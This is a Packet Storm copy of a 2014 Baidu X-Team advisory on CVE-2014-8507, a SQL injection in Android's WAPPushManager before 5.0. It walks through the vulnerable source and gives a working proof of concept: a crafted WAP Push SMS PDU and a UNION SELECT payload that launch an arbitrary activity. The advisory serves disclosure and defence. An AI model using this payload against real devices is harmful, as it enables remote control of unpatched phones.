exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Android WAPPushManager SQL Injection

Android WAPPushManager SQL Injection
Posted Nov 26, 2014
Authored by WangTao, Zhang Donghui, WangYu

Android versions prior to 5.0 suffer from a remote SQL injection vulnerability in the opt module WAPPushManager.

tags | exploit, remote, sql injection
advisories | CVE-2014-8507
SHA-256 | 18706be9be8033c24e8c2f06033de0b992c7dd3941e112ef9d8ce5cecd8fdef9

Android WAPPushManager SQL Injection

Change Mirror Download

INTRODUCTION
==================================
In Android <5.0, a SQL injection vulnerability exists in the opt module WAPPushManager, attacker can remotely send malformed WAPPush message to launch any activity or service in the victim's phone (need permission check)

DETAILS
==================================
When a WAPPush message is received, the raw pdu is processed by dispatchWapPdu method in com\android\internal\telephony\WapPushOverSms.java

Here the pdu is parsed to get the contentType & wapAppId:

String mimeType = pduDecoder.getValueString();
...
/**
* Seek for application ID field in WSP header.
* If application ID is found, WapPushManager substitute the message
* processing. Since WapPushManager is optional module, if WapPushManager
* is not found, legacy message processing will be continued.
*/
if (pduDecoder.seekXWapApplicationId(index, index + headerLength - 1)) {
index = (int) pduDecoder.getValue32();
pduDecoder.decodeXWapApplicationId(index);
String wapAppId = pduDecoder.getValueString();
if (wapAppId == null) {
wapAppId = Integer.toString((int) pduDecoder.getValue32());
}
String contentType = ((mimeType == null) ?
Long.toString(binaryContentType) : mimeType);
if (DBG) Rlog.v(TAG, "appid found: " + wapAppId + ":" + contentType);

The wapAppId & contentType can be literal string embeded in the pdu, to prove this, we can launch Android 4.4 emulator and send sms pdu by telnet console

Type the following command in telnet console:

sms pdu 0040000B915121551532F40004800B05040B84C0020003F001010A065603B081EAAF2720756e696f6e2073656c65637420302c27636f6d2e616e64726f69642e73657474696e6773272c27636f6d2e616e64726f69642e73657474696e67732e53657474696e6773272c302c302c302d2d200002066A008509036D6F62696C65746964696E67732E636F6D2F0001

And watch the radio logcat message in emulator, it prints out the extracted malicious appid:
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--

However, since the WAPPushManager is optional, it is not installed in the emulator, so it then prints "wap push manager not found!"

But if the WAPPushManager is installed, the extracted wapAppId & contentType will be send to its method processMessage:

try {
boolean processFurther = true;
IWapPushManager wapPushMan = mWapPushManager;
if (wapPushMan == null) {
if (DBG) Rlog.w(TAG, "wap push manager not found!");
} else {
Intent intent = new Intent();
intent.putExtra("transactionId", transactionId);
intent.putExtra("pduType", pduType);
intent.putExtra("header", header);
intent.putExtra("data", intentData);
intent.putExtra("contentTypeParameters",
pduDecoder.getContentParameters());
int procRet = wapPushMan.processMessage(wapAppId, contentType, intent);

So we go on checking the source code of WAPPushManager:

https://android.googlesource.com/platform/frameworks/base/+/android-4.4.4_r2.0.1/packages/WAPPushManager/

In the method processMessage, the app_id and content_type is used in the method queryLastApp:

public int processMessage(String app_id, String content_type, Intent intent)
throws RemoteException {
Log.d(LOG_TAG, "wpman processMsg " + app_id + ":" + content_type);
WapPushManDBHelper dbh = getDatabase(mContext);
SQLiteDatabase db = dbh.getReadableDatabase();
WapPushManDBHelper.queryData lastapp = dbh.queryLastApp(db, app_id, content_type);
db.close();

Then in the method queryLastApp, both app_id and content_type is concatenated without any escaping to build the rawQuery sql input,

protected queryData queryLastApp(SQLiteDatabase db,
String app_id, String content_type) {
String sql = "select install_order, package_name, class_name, "
+ " app_type, need_signature, further_processing"
+ " from " + APPID_TABLE_NAME
+ " where x_wap_application=\'" + app_id + "\'"
+ " and content_type=\'" + content_type + "\'"
+ " order by install_order desc";
if (DEBUG_SQL) Log.v(LOG_TAG, "sql: " + sql);
Cursor cur = db.rawQuery(sql, null);

Obviously, this is a SQL injection, for example, if app_id is as follows:
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--

Then the package_name & class_name of query result would be:
"com.android.settings" and "com.android.settings.Setttings"

OK, then we return back to the method processMessage of WAPPushManager
The appType, packageName, className is fully controllable, which will be used to set the component of an intent to start a activity or service
That means, attacker can remotely launch any activity or service by construct malformed WAPPush Message (need permission check)

if (lastapp.appType == WapPushManagerParams.APP_TYPE_ACTIVITY) {
//Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(lastapp.packageName, lastapp.className);
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
try {
mContext.startActivity(intent);
} catch (ActivityNotFoundException e) {
Log.w(LOG_TAG, "invalid name " +
lastapp.packageName + "/" + lastapp.className);
return WapPushManagerParams.INVALID_RECEIVER_NAME;
}
} else {
intent.setClassName(mContext, lastapp.className);
intent.setComponent(new ComponentName(lastapp.packageName,
lastapp.className));
if (mContext.startService(intent) == null) {
Log.w(LOG_TAG, "invalid name " +
lastapp.packageName + "/" + lastapp.className);
return WapPushManagerParams.INVALID_RECEIVER_NAME;
}
}

This has been fixed in android 5.0 (android bug id 17969135)
https://android.googlesource.com/platform/frameworks/base/+/48ed835468c6235905459e6ef7df032baf3e4df6

TIMELINE
==================================
11.10.2014 Initial report to Android Security Team with the POC
14.10.2014 Reply from Android Security Team "are looking into it"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, request status update
08.11.2014 Reply from Android Security Team "have fixed the issue in L (which is now in AOSP) and have provided patches to partners"
09.11.2014 Contact MITRE about this issue
17.11.2014 CVE-2014-8507 assigned
26.11.2014 Public Disclosure

IDENTIFIERS
==================================
CVE-2014-8507
Android id 17969135

CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team

--
BAIDU X-TEAM (xteam.baidu.com)
An external link of this advisory can be found at http://xteam.baidu.com/?p=167


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close